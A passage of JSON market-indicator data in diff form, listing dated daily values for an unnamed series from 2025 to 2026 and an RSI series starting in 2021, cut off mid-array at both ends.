100.0 + ], + [ + "2025-04-29", + 100.0 + ], + [ + "2025-04-30", + 100.0 + ], + [ + "2025-05-01", + 100.0 + ], + [ + "2025-05-02", + 100.0 + ], + [ + "2025-05-05", + 100.0 + ], + [ + "2025-05-06", + 100.0 + ], + [ + "2025-05-07", + 100.0 + ], + [ + "2025-05-08", + 49.9510523019267 + ], + [ + "2025-05-09", + 26.379678721014667 + ], + [ + "2025-05-12", + 39.33426937354987 + ], + [ + "2025-05-13", + 40.37477407920321 + ], + [ + "2025-05-14", + 40.36841285195219 + ], + [ + "2025-05-15", + 33.02080843974438 + ], + [ + "2025-05-16", + 32.64491295682703 + ], + [ + "2025-05-19", + 30.643554512747762 + ], + [ + "2025-05-20", + 31.24530592658681 + ], + [ + "2025-05-21", + 31.021213004709537 + ], + [ + "2025-05-22", + 23.65831760097796 + ], + [ + "2025-05-23", + 25.29395454310529 + ], + [ + "2025-05-27", + 27.94966592264494 + ], + [ + "2025-05-28", + 27.20769888623823 + ], + [ + "2025-05-29", + 27.238449688935244 + ], + [ + "2025-05-30", + 29.467998151844004 + ], + [ + "2025-06-02", + 27.04046360979348 + ], + [ + "2025-06-03", + 28.3528299609549 + ], + [ + "2025-06-04", + 27.449081811854555 + ], + [ + "2025-06-05", + 27.611843479321806 + ], + [ + "2025-06-06", + 23.073207247492064 + ], + [ + "2025-06-09", + 24.2093328527883 + ], + [ + "2025-06-10", + 6.319538260113948 + ], + [ + "2025-06-11", + 3.311297395098059 + ], + [ + "2025-06-12", + 3.3204093101982872 + ], + [ + "2025-06-13", + 6.931086017722035 + ], + [ + "2025-06-16", + 10.816097289466251 + ], + [ + "2025-06-17", + 10.941399985749715 + ], + [ + "2025-06-18", + 10.820360867126448 + ], + [ + "2025-06-20", + 9.005393578599037 + ], + [ + "2025-06-23", + 8.028043440440026 + ], + [ + "2025-06-24", + 10.530670591125785 + ], + [ + "2025-06-25", + 7.195221697411069 + ], + [ + "2025-06-26", + 6.534881972046898 + ], + [ + "2025-06-27", + 6.797773803066389 + ], + [ + "2025-06-30", + 3.142604684803437 + ], + [ + "2025-07-01", + 3.6804615956871136 + ], + [ + "2025-07-02", + 1.9584206603760832 + ], + [ + "2025-07-03", + 1.5738964171551901 + ], + [ + "2025-07-07", + 4.137932976289208 + ], + [ + "2025-07-08", + 5.067213890803389 + ], + [ + "2025-07-09", + 2.405364446749873 + ], + [ + "2025-07-10", + 0.9341449703577279 + ], + [ + "2025-07-11", + 0.0 + ], + [ + "2025-07-14", + 1.0043781510150083 + ], + [ + "2025-07-15", + 0.0 + ], + [ + "2025-07-16", + 0.0 + ], + [ + "2025-07-17", + 0.0 + ], + [ + "2025-07-18", + 0.10115318480732227 + ], + [ + "2025-07-21", + 0.0 + ], + [ + "2025-07-22", + 2.1636032688072375 + ], + [ + "2025-07-23", + 0.0 + ], + [ + "2025-07-24", + 0.0 + ], + [ + "2025-07-25", + 0.0 + ], + [ + "2025-07-28", + 1.8564946167271401 + ], + [ + "2025-07-29", + 1.845830628575496 + ], + [ + "2025-07-30", + 1.7075111409956774 + ], + [ + "2025-07-31", + 6.764330231960361 + ], + [ + "2025-08-01", + 7.31184304484809 + ], + [ + "2025-08-04", + 6.440510359094061 + ], + [ + "2025-08-05", + 4.321780227812737 + ], + [ + "2025-08-06", + 4.397080113434474 + ], + [ + "2025-08-07", + 5.2525246665677106 + ], + [ + "2025-08-08", + 5.9614265443164625 + ], + [ + "2025-08-11", + 5.441731152703942 + ], + [ + "2025-08-12", + 10.56418819715878 + ], + [ + "2025-08-13", + 11.528060633122664 + ], + [ + "2025-08-14", + 11.505978087342266 + ], + [ + "2025-08-15", + 14.51241142998006 + ], + [ + "2025-08-18", + 14.510319199661653 + ], + [ + "2025-08-19", + 14.709418329938451 + ], + [ + "2025-08-20", + 14.628968143862881 + ], + [ + "2025-08-21", + 14.783354859777239 + ], + [ + "2025-08-22", + 18.177151226897408 + ], + [ + "2025-08-25", + 17.09273872210704 + ], + [ + "2025-08-26", + 17.31947475572866 + ], + [ + "2025-08-27", + 17.151101444243118 + ], + [ + "2025-08-28", + 11.644473144895857 + ], + [ + "2025-08-29", + 15.572011997051938 + ], + [ + "2025-09-02", + 15.514819966181811 + ], + [ + "2025-09-03", + 15.403908753429029 + ], + [ + "2025-09-04", + 15.46102222607146 + ], + [ + "2025-09-05", + 15.075106647281197 + ], + [ + "2025-09-08", + 14.96279856287391 + ], + [ + "2025-09-09", + 14.931213845266763 + ], + [ + "2025-09-10", + 11.659287924049593 + ], + [ + "2025-09-11", + 10.696158893726663 + ], + [ + "2025-09-12", + 10.692707925743015 + ], + [ + "2025-09-15", + 7.616053210352962 + ], + [ + "2025-09-16", + 7.689784839081266 + ], + [ + "2025-09-17", + 5.743520438286877 + ], + [ + "2025-09-18", + 10.884803705431583 + ], + [ + "2025-09-19", + 10.923227558545582 + ], + [ + "2025-09-22", + 8.414614796543388 + ], + [ + "2025-09-23", + 8.371877258156253 + ], + [ + "2025-09-24", + 8.413709630745089 + ], + [ + "2025-09-25", + 8.68673919912388 + ], + [ + "2025-09-26", + 8.696059582240876 + ], + [ + "2025-09-29", + 1.7482139488690662 + ], + [ + "2025-09-30", + 0.07611330768477126 + ], + [ + "2025-10-01", + 0.5500778056056772 + ], + [ + "2025-10-02", + 1.766411339454148 + ], + [ + "2025-10-03", + 3.0781096652968483 + ], + [ + "2025-10-06", + 6.667251762386041 + ], + [ + "2025-10-07", + 11.611616551549488 + ], + [ + "2025-10-08", + 14.829956939980077 + ], + [ + "2025-10-09", + 15.424185084364774 + ], + [ + "2025-10-10", + 33.87288656459425 + ], + [ + "2025-10-13", + 39.92819010674808 + ], + [ + "2025-10-14", + 41.95193967873729 + ], + [ + "2025-10-15", + 43.81336782338311 + ], + [ + "2025-10-16", + 41.1934517072021 + ], + [ + "2025-10-17", + 41.002352775205395 + ], + [ + "2025-10-20", + 41.1265029394609 + ], + [ + "2025-10-21", + 41.335958741412234 + ], + [ + "2025-10-22", + 43.657205903403195 + ], + [ + "2025-10-23", + 44.72895784254825 + ], + [ + "2025-10-24", + 45.06925588417337 + ], + [ + "2025-10-27", + 46.44653291589902 + ], + [ + "2025-10-28", + 46.51624228155334 + ], + [ + "2025-10-29", + 46.37028080209896 + ], + [ + "2025-10-30", + 46.695024799741766 + ], + [ + "2025-10-31", + 46.3228188423198 + ], + [ + "2025-11-03", + 44.398426692885934 + ], + [ + "2025-11-04", + 47.586404280672674 + ], + [ + "2025-11-05", + 47.17278805022412 + ], + [ + "2025-11-06", + 49.36245391270611 + ], + [ + "2025-11-07", + 37.18299610728229 + ], + [ + "2025-11-10", + 32.26315603647073 + ], + [ + "2025-11-11", + 32.60633448917901 + ], + [ + "2025-11-12", + 30.42909353128386 + ], + [ + "2025-11-13", + 34.6612880135112 + ], + [ + "2025-11-14", + 34.67529210355815 + ], + [ + "2025-11-17", + 34.6424435253762 + ], + [ + "2025-11-18", + 35.97474204368035 + ], + [ + "2025-11-19", + 35.09666808117343 + ], + [ + "2025-11-20", + 39.47622611742588 + ], + [ + "2025-11-21", + 38.84599300597641 + ], + [ + "2025-11-24", + 42.39820617961823 + ], + [ + "2025-11-25", + 42.46182243699656 + ], + [ + "2025-11-26", + 44.044722050201024 + ], + [ + "2025-11-28", + 44.78949808180139 + ], + [ + "2025-12-01", + 44.74994875281036 + ], + [ + "2025-12-02", + 45.88668656020343 + ], + [ + "2025-12-03", + 42.40365134352668 + ], + [ + "2025-12-04", + 40.08674367917399 + ], + [ + "2025-12-05", + 37.84541504753645 + ], + [ + "2025-12-08", + 37.56565478664857 + ], + [ + "2025-12-09", + 35.87735195771366 + ], + [ + "2025-12-10", + 34.00239888041506 + ], + [ + "2025-12-11", + 33.77101318675299 + ], + [ + "2025-12-12", + 37.759050821703894 + ], + [ + "2025-12-15", + 37.79915522524281 + ], + [ + "2025-12-16", + 36.79512672096728 + ], + [ + "2025-12-17", + 39.63413231266052 + ], + [ + "2025-12-18", + 40.52017637301754 + ], + [ + "2025-12-19", + 33.76800489838868 + ], + [ + "2025-12-22", + 33.85159153273191 + ], + [ + "2025-12-23", + 28.6647276969574 + ], + [ + "2025-12-24", + 28.66083056283049 + ], + [ + "2025-12-26", + 26.43284390407974 + ], + [ + "2025-12-29", + 25.591647860523597 + ], + [ + "2025-12-30", + 25.61387611825155 + ], + [ + "2025-12-31", + 24.80513905112604 + ], + [ + "2026-01-02", + 29.515477344300905 + ], + [ + "2026-01-05", + 29.59966832342994 + ], + [ + "2026-01-06", + 32.54518036615796 + ], + [ + "2026-01-07", + 32.92161408963682 + ], + [ + "2026-01-08", + 34.04743661951871 + ], + [ + "2026-01-09", + 36.053398927194614 + ], + [ + "2026-01-12", + 35.85155175472196 + ], + [ + "2026-01-13", + 26.265592245758175 + ], + [ + "2026-01-14", + 26.255696010844847 + ], + [ + "2026-01-15", + 26.14031122287509 + ], + [ + "2026-01-16", + 17.99796473765049 + ], + [ + "2026-01-20", + 19.41289978759223 + ], + [ + "2026-01-21", + 20.3345690438847 + ], + [ + "2026-01-22", + 20.372348158648183 + ], + [ + "2026-01-23", + 21.658879646101028 + ], + [ + "2026-01-26", + 22.13295507499123 + ], + [ + "2026-01-27", + 23.171535447886065 + ], + [ + "2026-01-28", + 24.13129531559366 + ], + [ + "2026-01-29", + 23.939223260311643 + ], + [ + "2026-01-30", + 31.330939873234282 + ], + [ + "2026-02-02", + 27.453405884478144 + ], + [ + "2026-02-03", + 29.563979612160367 + ], + [ + "2026-02-04", + 33.75528317925843 + ], + [ + "2026-02-05", + 33.32457166735614 + ], + [ + "2026-02-06", + 40.24404656375855 + ], + [ + "2026-02-09", + 38.566143883967925 + ], + [ + "2026-02-10", + 38.71738912911983 + ], + [ + "2026-02-11", + 40.010271407842666 + ], + [ + "2026-02-12", + 42.14399526261298 + ], + [ + "2026-02-13", + 41.68789248245208 + ], + [ + "2026-02-17", + 41.21275290214162 + ], + [ + "2026-02-18", + 40.43030946259673 + ], + [ + "2026-02-19", + 37.88331385136663 + ], + [ + "2026-02-20", + 38.09310353374899 + ], + [ + "2026-02-23", + 37.774633453866684 + ], + [ + "2026-02-24", + 38.003864465603854 + ], + [ + "2026-02-25", + 37.224516815914065 + ], + [ + "2026-02-26", + 38.28488400618614 + ], + [ + "2026-02-27", + 38.737805333277834 + ], + [ + "2026-03-02", + 33.318434909859945 + ], + [ + "2026-03-03", + 39.77829170614053 + ], + [ + "2026-03-04", + 40.08252091579131 + ], + [ + "2026-03-05", + 34.33530139044451 + ], + [ + "2026-03-06", + 39.97493475701962 + ], + [ + "2026-03-09", + 35.431619998488046 + ], + [ + "2026-03-10", + 35.08993423501548 + ], + [ + "2026-03-11", + 35.45697849312368 + ], + [ + "2026-03-12", + 36.2617449409744 + ], + [ + "2026-03-13", + 35.009678915230054 + ], + [ + "2026-03-16", + 36.24578110547068 + ], + [ + "2026-03-17", + 36.55940632548045 + ], + [ + "2026-03-18", + 36.10884673091617 + ], + [ + "2026-03-19", + 36.262935914774175 + ], + [ + "2026-03-20", + 36.99113525642785 + ], + [ + "2026-03-23", + 37.73319932238304 + ], + [ + "2026-03-24", + 37.596828773709284 + ], + [ + "2026-03-25", + 37.2031850067754 + ], + [ + "2026-03-26", + 40.8756576260676 + ], + [ + "2026-03-27", + 41.06319290443203 + ], + [ + "2026-03-30", + 45.114098573770725 + ], + [ + "2026-03-31", + 50.20961073588857 + ], + [ + "2026-04-01", + 51.58123813854235 + ], + [ + "2026-04-02", + 51.29958379144631 + ], + [ + "2026-04-06", + 46.4801823895735 + ], + [ + "2026-04-07", + 43.150056974396826 + ], + [ + "2026-04-08", + 53.21940932738302 + ], + [ + "2026-04-09", + 53.911383649806254 + ], + [ + "2026-04-10", + 50.0216054582866 + ], + [ + "2026-04-13", + 50.18799662649601 + ], + [ + "2026-04-14", + 50.195608891302754 + ], + [ + "2026-04-15", + 50.294454186846394 + ], + [ + "2026-04-16", + 49.73116110049367 + ], + [ + "2026-04-17", + 50.18748736961084 + ], + [ + "2026-04-20", + 47.2921369171868 + ], + [ + "2026-04-21", + 47.335275867105494 + ], + [ + "2026-04-22", + 47.86190613857885 + ], + [ + "2026-04-23", + 48.141742401868285 + ] + ], + "rsi": [ + [ + "2021-04-16", + 50.0 + ], + [ + "2021-04-19", + 0.0 + ], + [ + "2021-04-20", + 0.0 + ], + [ + "2021-04-21", + 7.084578201410295 + ], + [ + "2021-04-22", + 6.652346902139158 + ], + [ + "2021-04-23", + 11.421332729630379 + ], + [ + "2021-04-26", + 16.142097556693855 + ], + [ + "2021-04-27", + 15.764902604926121 + ], + [ + "2021-04-28", + 15.006239812055469 + ], + [ + "2021-04-29", + 16.82130020256244 + ], + [ + "2021-04-30", + 15.300635675272247 + ], + [ + "2021-05-03", + 14.778623129740595 + ], + [ + "2021-05-04", + 13.956337638682498 + ], + [ + "2021-05-05", + 15.798174616793489 + ], + [ + "2021-05-06", + 18.283029969222554 + ], + [ + "2021-05-07", + 22.44208451881444 + ], + [ + "2021-05-10", + 19.019435814264227 + ], + [ + "2021-05-11", + 19.400126985557947 + ], + [ + "2021-05-12", + 16.80688112615961 + ], + [ + "2021-05-13", + 20.252306082859704 + ], + [ + "2021-05-14", + 28.135394887229154 + ], + [ + "2021-05-17", + 27.291314141138344 + ], + [ + "2021-05-18", + 26.50769314639291 + ], + [ + "2021-05-19", + 31.589873734111976 + ], + [ + "2021-05-20", + 37.94447649739928 + ], + [ + "2021-05-21", + 37.143558474414085 + ], + [ + "2021-05-24", + 43.032827436332425 + ], + [ + "2021-05-25", + 43.71686242822937 + ], + [ + "2021-05-26", + 44.36777336742312 + ], + [ + "2021-05-27", + 45.440671697590126 + ], + [ + "2021-05-28", + 47.83640681690908 + ], + [ + "2021-06-01", + 47.15847224998683 + ], + [ + "2021-06-02", + 48.85499641309194 + ], + [ + "2021-06-03", + 44.4912881735368 + ], + [ + "2021-06-04", + 51.032638706252015 + ], + [ + "2021-06-07", + 48.99212412525921 + ], + [ + "2021-06-08", + 47.5001853250261 + ], + [ + "2021-06-09", + 46.204977765708115 + ], + [ + "2021-06-10", + 49.642479713593715 + ], + [ + "2021-06-11", + 51.13852619402424 + ], + [ + "2021-06-14", + 55.19075254857383 + ], + [ + "2021-06-15", + 52.45120229199735 + ], + [ + "2021-06-16", + 49.443064602502616 + ], + [ + "2021-06-17", + 52.75745512109525 + ], + [ + "2021-06-18", + 45.543417905874136 + ], + [ + "2021-06-21", + 46.72402745193119 + ], + [ + "2021-06-22", + 48.27542364774368 + ], + [ + "2021-06-23", + 49.674795251022715 + ], + [ + "2021-06-24", + 55.038799275935766 + ], + [ + "2021-06-25", + 54.02904240198021 + ], + [ + "2021-06-28", + 60.805165066898695 + ], + [ + "2021-06-29", + 62.79088678015931 + ], + [ + "2021-06-30", + 63.00808362490462 + ], + [ + "2021-07-01", + 56.880653973667116 + ], + [ + "2021-07-02", + 58.694703990129774 + ], + [ + "2021-07-06", + 57.95414459972302 + ], + [ + "2021-07-07", + 51.73652000465896 + ], + [ + "2021-07-08", + 47.181730250476136 + ], + [ + "2021-07-09", + 52.79041316908247 + ], + [ + "2021-07-12", + 56.74483759607708 + ], + [ + "2021-07-13", + 55.17303728417463 + ], + [ + "2021-07-14", + 53.34354523797721 + ], + [ + "2021-07-15", + 45.56102572495217 + ], + [ + "2021-07-16", + 39.60277296708792 + ], + [ + "2021-07-19", + 39.351467257386005 + ], + [ + "2021-07-20", + 44.47940250655524 + ], + [ + "2021-07-21", + 54.038183433775146 + ], + [ + "2021-07-22", + 52.122826696913414 + ], + [ + "2021-07-23", + 53.64338048272828 + ], + [ + "2021-07-26", + 53.74137188333971 + ], + [ + "2021-07-27", + 47.43826619278783 + ], + [ + "2021-07-28", + 52.663516531639196 + ], + [ + "2021-07-29", + 58.324997191561096 + ], + [ + "2021-07-30", + 60.41288687071104 + ], + [ + "2021-08-02", + 62.00962283669037 + ], + [ + "2021-08-03", + 63.90824693903633 + ], + [ + "2021-08-04", + 66.35049663688642 + ], + [ + "2021-08-05", + 66.39202505964865 + ], + [ + "2021-08-06", + 63.918730435417814 + ], + [ + "2021-08-09", + 62.22592544921675 + ], + [ + "2021-08-10", + 56.70857489015657 + ], + [ + "2021-08-11", + 55.173903243938334 + ], + [ + "2021-08-12", + 50.565257707180045 + ], + [ + "2021-08-13", + 53.01017959387351 + ], + [ + "2021-08-16", + 51.38172545134053 + ], + [ + "2021-08-17", + 43.84555274027461 + ], + [ + "2021-08-18", + 39.65116331549924 + ], + [ + "2021-08-19", + 43.23173573036062 + ], + [ + "2021-08-20", + 46.390780869018236 + ], + [ + "2021-08-23", + 56.291934141443015 + ], + [ + "2021-08-24", + 56.291934141443015 + ], + [ + "2021-08-25", + 58.74920826344223 + ], + [ + "2021-08-26", + 59.054614558896176 + ], + [ + "2021-08-27", + 64.81005285166358 + ], + [ + "2021-08-30", + 65.36877497552382 + ], + [ + "2021-08-31", + 61.17374756659131 + ], + [ + "2021-09-01", + 58.441860682463165 + ], + [ + "2021-09-02", + 59.76220800557091 + ], + [ + "2021-09-03", + 62.35351508291795 + ], + [ + "2021-09-07", + 60.28695507575088 + ], + [ + "2021-09-08", + 53.63617987455451 + ], + [ + "2021-09-09", + 55.08359324598919 + ], + [ + "2021-09-10", + 58.25995608937929 + ], + [ + "2021-09-13", + 61.800035271829664 + ], + [ + "2021-09-14", + 61.815604233039686 + ], + [ + "2021-09-15", + 63.96196062250853 + ], + [ + "2021-09-16", + 64.67738479579128 + ], + [ + "2021-09-17", + 54.87901822747391 + ], + [ + "2021-09-20", + 43.9302371354625 + ], + [ + "2021-09-21", + 45.29688838247253 + ], + [ + "2021-09-22", + 53.841131696380074 + ], + [ + "2021-09-23", + 58.42495592916771 + ], + [ + "2021-09-24", + 57.88508865508135 + ], + [ + "2021-09-27", + 56.689806836332885 + ], + [ + "2021-09-28", + 41.78510195605013 + ], + [ + "2021-09-29", + 37.653462240138765 + ], + [ + "2021-09-30", + 37.55281856923625 + ], + [ + "2021-10-01", + 37.841203225952164 + ], + [ + "2021-10-04", + 31.61311042951398 + ], + [ + "2021-10-05", + 37.91484004567258 + ], + [ + "2021-10-06", + 39.484683978546265 + ], + [ + "2021-10-07", + 44.071305631251526 + ], + [ + "2021-10-08", + 41.098798217016316 + ], + [ + "2021-10-11", + 39.253857920075056 + ], + [ + "2021-10-12", + 36.02855761035062 + ], + [ + "2021-10-13", + 38.51147304009844 + ], + [ + "2021-10-14", + 49.85278099664448 + ], + [ + "2021-10-15", + 51.96747439053284 + ], + [ + "2021-10-18", + 54.48109291489103 + ], + [ + "2021-10-19", + 58.10043992448428 + ], + [ + "2021-10-20", + 57.26144224914802 + ], + [ + "2021-10-21", + 60.26147097554417 + ], + [ + "2021-10-22", + 55.54030937600339 + ], + [ + "2021-10-25", + 57.69944245559015 + ], + [ + "2021-10-26", + 57.94225327393266 + ], + [ + "2021-10-27", + 54.71410344195083 + ], + [ + "2021-10-28", + 61.854379843620244 + ], + [ + "2021-10-29", + 63.12233202996761 + ], + [ + "2021-11-01", + 67.40283624437697 + ], + [ + "2021-11-02", + 70.2824605810593 + ], + [ + "2021-11-03", + 72.7178790616635 + ], + [ + "2021-11-04", + 78.35678212253424 + ], + [ + "2021-11-05", + 79.88431273433086 + ], + [ + "2021-11-08", + 81.60543155345275 + ], + [ + "2021-11-09", + 81.60543155345275 + ], + [ + "2021-11-10", + 66.92473418800208 + ], + [ + "2021-11-11", + 70.85494205792253 + ], + [ + "2021-11-12", + 72.5152788942658 + ], + [ + "2021-11-15", + 72.17465300229541 + ], + [ + "2021-11-16", + 74.74293551731981 + ], + [ + "2021-11-17", + 71.393811933312 + ], + [ + "2021-11-18", + 74.34492088129973 + ], + [ + "2021-11-19", + 74.81755396608696 + ], + [ + "2021-11-22", + 67.78635071755443 + ], + [ + "2021-11-23", + 65.96095769236653 + ], + [ + "2021-11-24", + 68.45210642844916 + ], + [ + "2021-11-26", + 56.958292397560406 + ], + [ + "2021-11-29", + 65.36734645099781 + ], + [ + "2021-11-30", + 59.44616938493907 + ], + [ + "2021-12-01", + 56.95638563267932 + ], + [ + "2021-12-02", + 57.30241677610845 + ], + [ + "2021-12-03", + 56.44730672618695 + ], + [ + "2021-12-06", + 55.99390652853739 + ], + [ + "2021-12-07", + 67.18846444880937 + ], + [ + "2021-12-08", + 64.78449194543416 + ], + [ + "2021-12-09", + 57.06404941053509 + ], + [ + "2021-12-10", + 59.16531457376831 + ], + [ + "2021-12-13", + 51.44059299125697 + ], + [ + "2021-12-14", + 50.20000184539422 + ], + [ + "2021-12-15", + 58.40540550465369 + ], + [ + "2021-12-16", + 47.92816091543338 + ], + [ + "2021-12-17", + 47.45382393596303 + ], + [ + "2021-12-20", + 45.83617605768391 + ], + [ + "2021-12-21", + 53.61682238114153 + ], + [ + "2021-12-22", + 55.66404360020817 + ], + [ + "2021-12-23", + 57.56053368765196 + ], + [ + "2021-12-27", + 62.50232879873242 + ], + [ + "2021-12-28", + 59.42021411518015 + ], + [ + "2021-12-29", + 59.71340174467892 + ], + [ + "2021-12-30", + 56.45736111467214 + ], + [ + "2021-12-31", + 55.597126736168164 + ], + [ + "2022-01-03", + 59.9196579928446 + ], + [ + "2022-01-04", + 58.94513452443624 + ], + [ + "2022-01-05", + 49.41032202833167 + ], + [ + "2022-01-06", + 51.28602671495912 + ], + [ + "2022-01-07", + 44.590087923106054 + ], + [ + "2022-01-10", + 44.68494770249241 + ], + [ + "2022-01-11", + 49.49507991625182 + ], + [ + "2022-01-12", + 51.3078971354695 + ], + [ + "2022-01-13", + 45.65595109443181 + ], + [ + "2022-01-14", + 51.42736087777456 + ], + [ + "2022-01-18", + 42.19908919767984 + ], + [ + "2022-01-19", + 37.62711153765323 + ], + [ + "2022-01-20", + 33.57437796131322 + ], + [ + "2022-01-21", + 31.684773756358524 + ], + [ + "2022-01-24", + 34.369838163237375 + ], + [ + "2022-01-25", + 30.153318302201598 + ], + [ + "2022-01-26", + 33.62844811970973 + ], + [ + "2022-01-27", + 29.049273177762515 + ], + [ + "2022-01-28", + 33.0874461158804 + ], + [ + "2022-01-31", + 43.05309204000378 + ], + [ + "2022-02-01", + 44.506246218253914 + ], + [ + "2022-02-02", + 48.810806338798464 + ], + [ + "2022-02-03", + 42.53391951538704 + ], + [ + "2022-02-04", + 43.52022702152866 + ], + [ + "2022-02-07", + 43.44057293826241 + ], + [ + "2022-02-08", + 48.0163711427083 + ], + [ + "2022-02-09", + 53.41574125914047 + ], + [ + "2022-02-10", + 48.13259598329452 + ], + [ + "2022-02-11", + 41.192768865780074 + ], + [ + "2022-02-14", + 41.35377756809513 + ], + [ + "2022-02-15", + 49.95141963916686 + ], + [ + "2022-02-16", + 50.00069496146726 + ], + [ + "2022-02-17", + 44.56362704126007 + ], + [ + "2022-02-18", + 43.11818238722842 + ], + [ + "2022-02-22", + 42.32154043265938 + ], + [ + "2022-02-23", + 39.280608427452805 + ], + [ + "2022-02-24", + 45.59029760535824 + ], + [ + "2022-02-25", + 48.3213265723981 + ], + [ + "2022-02-28", + 47.37172139943856 + ], + [ + "2022-03-01", + 42.09138941467259 + ], + [ + "2022-03-02", + 47.42585100359739 + ], + [ + "2022-03-03", + 44.42598052177378 + ], + [ + "2022-03-04", + 40.96927070356217 + ], + [ + "2022-03-07", + 35.496422986584406 + ], + [ + "2022-03-08", + 38.696929504830955 + ], + [ + "2022-03-09", + 45.22035877693886 + ], + [ + "2022-03-10", + 42.72272382530162 + ], + [ + "2022-03-11", + 40.2682573650046 + ], + [ + "2022-03-14", + 36.90000638536254 + ], + [ + "2022-03-15", + 43.85015648582276 + ], + [ + "2022-03-16", + 50.70257638620802 + ], + [ + "2022-03-17", + 51.50487578719853 + ], + [ + "2022-03-18", + 54.06963392259375 + ], + [ + "2022-03-21", + 53.75270229137356 + ], + [ + "2022-03-22", + 54.55233257316254 + ], + [ + "2022-03-23", + 50.26874392308579 + ], + [ + "2022-03-24", + 57.31845656417303 + ], + [ + "2022-03-25", + 56.909609771391885 + ], + [ + "2022-03-28", + 58.01490942126319 + ], + [ + "2022-03-29", + 61.2018079938168 + ], + [ + "2022-03-30", + 54.80727714297385 + ], + [ + "2022-03-31", + 50.8652895280736 + ], + [ + "2022-04-01", + 47.78543891496442 + ], + [ + "2022-04-04", + 50.44250240131796 + ], + [ + "2022-04-05", + 43.56772008952227 + ], + [ + "2022-04-06", + 40.50350839021011 + ], + [ + "2022-04-07", + 40.88766041598069 + ], + [ + "2022-04-08", + 37.893573212234024 + ], + [ + "2022-04-11", + 35.62494434770639 + ], + [ + "2022-04-12", + 35.29434091710846 + ], + [ + "2022-04-13", + 39.547201271588825 + ], + [ + "2022-04-14", + 36.18436897967081 + ], + [ + "2022-04-18", + 39.55331803375961 + ], + [ + "2022-04-19", + 43.67612535925688 + ], + [ + "2022-04-20", + 43.34639639711084 + ], + [ + "2022-04-21", + 39.49648985489119 + ], + [ + "2022-04-22", + 36.65170550200445 + ], + [ + "2022-04-25", + 40.10379155614467 + ], + [ + "2022-04-26", + 34.676120671022886 + ], + [ + "2022-04-27", + 34.09090809009055 + ], + [ + "2022-04-28", + 44.254763905430046 + ], + [ + "2022-04-29", + 38.96182800195049 + ], + [ + "2022-05-02", + 44.32502482010438 + ], + [ + "2022-05-03", + 45.643564244302496 + ], + [ + "2022-05-04", + 51.487448546211134 + ], + [ + "2022-05-05", + 44.765611216433456 + ], + [ + "2022-05-06", + 43.68970685817326 + ], + [ + "2022-05-09", + 38.10684243960168 + ], + [ + "2022-05-10", + 41.51840403066424 + ], + [ + "2022-05-11", + 38.483739169333 + ], + [ + "2022-05-12", + 39.43478265334574 + ], + [ + "2022-05-13", + 46.91011320109814 + ], + [ + "2022-05-16", + 45.03475851529661 + ], + [ + "2022-05-17", + 51.58694647417102 + ], + [ + "2022-05-18", + 45.263436870389775 + ], + [ + "2022-05-19", + 44.59176949546159 + ], + [ + "2022-05-20", + 44.53002553192633 + ], + [ + "2022-05-23", + 45.195569952664215 + ], + [ + "2022-05-24", + 42.10632108224731 + ], + [ + "2022-05-25", + 45.023681962276704 + ], + [ + "2022-05-26", + 50.911066745076354 + ], + [ + "2022-05-27", + 56.40943219733175 + ], + [ + "2022-05-31", + 55.53835154684082 + ], + [ + "2022-06-01", + 52.83843063118575 + ], + [ + "2022-06-02", + 57.63227936516714 + ], + [ + "2022-06-03", + 52.524109191842044 + ], + [ + "2022-06-06", + 52.77758554042951 + ], + [ + "2022-06-07", + 53.99878766533457 + ], + [ + "2022-06-08", + 50.24136004479425 + ], + [ + "2022-06-09", + 45.766080404975966 + ], + [ + "2022-06-10", + 40.984865747423854 + ], + [ + "2022-06-13", + 34.84479854931844 + ], + [ + "2022-06-14", + 35.78579884072373 + ], + [ + "2022-06-15", + 38.746608280442096 + ], + [ + "2022-06-16", + 32.91749773677084 + ], + [ + "2022-06-17", + 33.59791293086302 + ], + [ + "2022-06-21", + 37.988876215434054 + ], + [ + "2022-06-22", + 36.914113601566456 + ], + [ + "2022-06-23", + 36.20397045911514 + ], + [ + "2022-06-24", + 43.758608540089384 + ], + [ + "2022-06-27", + 43.40171402046483 + ], + [ + "2022-06-28", + 40.25773057795697 + ], + [ + "2022-06-29", + 37.49700234439722 + ], + [ + "2022-06-30", + 36.053700707750735 + ], + [ + "2022-07-01", + 32.465965383352966 + ], + [ + "2022-07-05", + 33.98718530655253 + ], + [ + "2022-07-06", + 34.97161844141347 + ], + [ + "2022-07-07", + 43.35141140885669 + ], + [ + "2022-07-08", + 44.21220191287756 + ], + [ + "2022-07-11", + 40.95580454943619 + ], + [ + "2022-07-12", + 41.506247358129315 + ], + [ + "2022-07-13", + 42.669246598427385 + ], + [ + "2022-07-14", + 46.964849117456154 + ], + [ + "2022-07-15", + 51.46664077357549 + ], + [ + "2022-07-18", + 50.82984154999392 + ], + [ + "2022-07-19", + 58.445643130323546 + ], + [ + "2022-07-20", + 62.247919486394544 + ], + [ + "2022-07-21", + 64.54390473708523 + ], + [ + "2022-07-22", + 58.656085906531374 + ], + [ + "2022-07-25", + 57.24863700074213 + ], + [ + "2022-07-26", + 53.619302954306505 + ], + [ + "2022-07-27", + 60.838582987763395 + ], + [ + "2022-07-28", + 62.604009107820815 + ], + [ + "2022-07-29", + 63.71744022308335 + ], + [ + "2022-08-01", + 64.29535954029438 + ], + [ + "2022-08-02", + 63.75201183590592 + ], + [ + "2022-08-03", + 67.98750175690407 + ], + [ + "2022-08-04", + 69.0287868004026 + ], + [ + "2022-08-05", + 66.49938900785195 + ], + [ + "2022-08-08", + 61.79978231897712 + ], + [ + "2022-08-09", + 50.3616373232564 + ], + [ + "2022-08-10", + 57.65534247868062 + ], + [ + "2022-08-11", + 57.36114615477951 + ], + [ + "2022-08-12", + 62.0762516189334 + ], + [ + "2022-08-15", + 62.6585475459871 + ], + [ + "2022-08-16", + 59.925640814530546 + ], + [ + "2022-08-17", + 53.99788650515859 + ], + [ + "2022-08-18", + 58.10781073706353 + ], + [ + "2022-08-19", + 52.0421540088516 + ], + [ + "2022-08-22", + 45.15819072079077 + ], + [ + "2022-08-23", + 46.13543200206634 + ], + [ + "2022-08-24", + 46.65523035019908 + ], + [ + "2022-08-25", + 53.68497967738146 + ], + [ + "2022-08-26", + 43.728339852463556 + ], + [ + "2022-08-29", + 40.98002768020697 + ], + [ + "2022-08-30", + 39.471051386660356 + ], + [ + "2022-08-31", + 38.12750124573939 + ], + [ + "2022-09-01", + 35.82353418014898 + ], + [ + "2022-09-02", + 34.52019968069601 + ], + [ + "2022-09-06", + 33.16836133342959 + ], + [ + "2022-09-07", + 37.01780326352428 + ], + [ + "2022-09-08", + 40.742517224618666 + ], + [ + "2022-09-09", + 